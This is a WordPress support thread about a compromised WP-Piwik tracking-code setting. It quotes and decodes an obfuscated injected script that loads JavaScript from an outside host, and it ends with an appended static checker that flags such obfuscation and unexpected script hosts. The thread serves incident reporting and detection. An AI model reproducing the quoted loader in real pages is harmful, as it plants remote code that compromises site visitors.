Title: wp-piwik-tracking_code : malicious code
Last modified: January 7, 2018

---

# wp-piwik-tracking_code : malicious code

 *  [casimarc](https://wordpress.org/support/users/casimarc/)
 * (@casimarc)
 * [8 years, 5 months ago](https://wordpress.org/support/topic/wp-piwik-tracking_code-malicious-code/)
 * hi,
 * not really sure if it’s the good place but i was hit by a malware which modified
   my wp-piwik-tracking_code to load code from another site;
 * my versions (wordpress and wp-piwik) weren’t up-to-date so i’m guilty but i think
   i’m not alone in this case.
 * wp-piwik-tracking_code was modified to:
   ```
   <script>var sc = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116));
   sc.src=String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 106, 97, 114, 46, 116,
   114, 97, 102, 102, 105, 99, 98, 101, 116, 116, 101, 114, 46, 98, 105, 122, 47, 115, 46,
   106, 115);
   sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114,
   105, 112, 116);
   document.getElementsByTagName(String.fromCharCode(104, 101, 97, 100))[0].appendChild(sc);</script>
   ```
 * which can be decoded to
   ```
   var sc = document.createElement("script");
   sc.type = "text/javascript";
   sc.src = "https://jar.trafficbetter.biz/s.js";
   document.head.appendChild(sc);
   ```
 * regards,

Viewing 1 replies (of 1 total)

 *  Plugin Author [braekling](https://wordpress.org/support/users/braekling/)
 * (@braekling)
 * [8 years, 5 months ago](https://wordpress.org/support/topic/wp-piwik-tracking_code-malicious-code/#post-9846603)
 * Did you also check your Piwik setup? Does Piwik itself deliver the malformed
   tracking code (so the attacker used Piwik) or was it directly injected into WordPress
   or via WP-Piwik?
 * You can test Piwik’s API response by executing…
   `{PIWIK_URL}?module=API&method=SitesManager.getJavascriptTag&idSite={SITE_ID}&piwikUrl=&format=xml&token_auth={AUTH_TOKEN}`
   and…
   `{PIWIK_URL}?module=API&method=SitesManager.getImageTrackingCode&idSite={SITE_ID}&piwikUrl=&format=xml&token_auth={AUTH_TOKEN}`
 * This issue was reported 3-4 times in the last months, but no reporter ever gave
   feedback on how the attacker intruded. Currently, there are no known vulnerabilities
   in Piwik or WP-Piwik, and without further information we also have no chance
   to test this in more detail. See also: [https://github.com/braekling/WP-Matomo/issues/66](https://github.com/braekling/WP-Matomo/issues/66)
    -  This reply was modified 8 years, 5 months ago by [braekling](https://wordpress.org/support/users/braekling/).
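
A static check for the pattern reported in this thread, as an added example that is not part of either post or of WP-Piwik: it decodes `String.fromCharCode` calls as text, without evaluating anything, and flags script hosts outside an allowlist. It can be pointed at the stored tracking code or at the tag returned by the Piwik API. The function names, the allowlist and `analytics.example.org` are assumptions; the first sample is the snippet from the first post, the second is constructed.

```javascript
// Rewrite every String.fromCharCode(n, n, ...) call as the string literal it
// yields. This is text substitution only; the input is never evaluated.
function decodeCharCodes(source) {
  return source.replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, args) => {
    const codes = args.split(',').map((s) => s.trim()).filter(Boolean).map(Number);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Collect script URLs from <script src="..."> tags and `.src = "..."` assignments.
function findScriptSources(decoded) {
  const patterns = [
    /<script[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi,
    /\.src\s*=\s*["']([^"']+)["']/g,
  ];
  return patterns.flatMap((re) => [...decoded.matchAll(re)].map((m) => m[1]));
}

// Flag obfuscation and every script host that is not on the allowlist.
function auditTrackingCode(source, allowedHosts) {
  const decoded = decodeCharCodes(source);
  const findings = [];
  if (decoded !== source) findings.push('obfuscated with String.fromCharCode');
  for (const url of findScriptSources(decoded)) {
    let host;
    try {
      // Relative URLs resolve to the placeholder base and count as same-origin.
      host = new URL(url, 'https://relative.invalid').hostname;
    } catch {
      findings.push(`unparseable script URL: ${url}`);
      continue;
    }
    if (host !== 'relative.invalid' && !allowedHosts.includes(host)) {
      findings.push(`unexpected script host: ${host}`);
    }
  }
  return { decoded, findings };
}

// Snippet quoted in the first post of this thread.
const SAMPLE_FROM_POST = `<script>var sc = document.createElement(
String.fromCharCode(115, 99, 114, 105, 112, 116)); sc.src=String.fromCharCode(
104, 116, 116, 112, 115, 58, 47, 47, 106, 97, 114, 46, 116, 114, 97, 102, 102,
105, 99, 98, 101, 116, 116, 101, 114, 46, 98, 105, 122, 47, 115, 46, 106, 115);
sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115,
99, 114, 105, 112, 116); document.getElementsByTagName(String.fromCharCode(104,
101, 97, 100))[0].appendChild(sc);</script>`;
// Constructed clean sample; analytics.example.org stands in for the site's own Piwik host.
const CLEAN_SAMPLE = '<script src="https://analytics.example.org/piwik.js" async defer></script>';
console.log(auditTrackingCode(SAMPLE_FROM_POST, ['analytics.example.org']).findings);
```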
